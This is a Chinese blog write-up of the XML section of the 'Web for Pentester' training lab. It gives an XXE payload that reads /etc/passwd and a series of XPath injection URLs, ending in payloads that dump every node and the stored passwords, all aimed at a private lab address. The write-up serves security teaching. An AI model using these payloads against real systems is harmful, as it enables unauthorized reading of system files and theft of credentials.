Web for pentester_writeup之XML attacks篇

Web for pentester_writeup之XML attacks篇

XML attacks(XML攻击)

Example 1 - XML外部实体注入(XXE)

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181259909-649426507.png)

Payload
http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181311103-20902236.png)

Example 2 - Xpath注入

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181319011-891038369.png)
输入一个单引号,报错,分析报错信息发现xpath函数,猜测是xpath注入 <1> `http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='1`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181324774-2007834750.png)

<2> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181330451-1657338604.png)

<3> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='1

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181337206-2047698607.png)

<4> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181441610-362099624.png)

可知XPath的代码为 [PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]

Payload
http://192.168.219.136/xml/example2.php?name=' or 1=1]/parent::*/child::node()%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181446807-1802045137.png)

http://192.168.219.136/xml/example2.php?name=hacker' or 1=1]/parent::*/password%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181450842-1008994050.png)
posted @ 2019-09-25 14:46  只言  阅读(214)  评论(0编辑  收藏  举报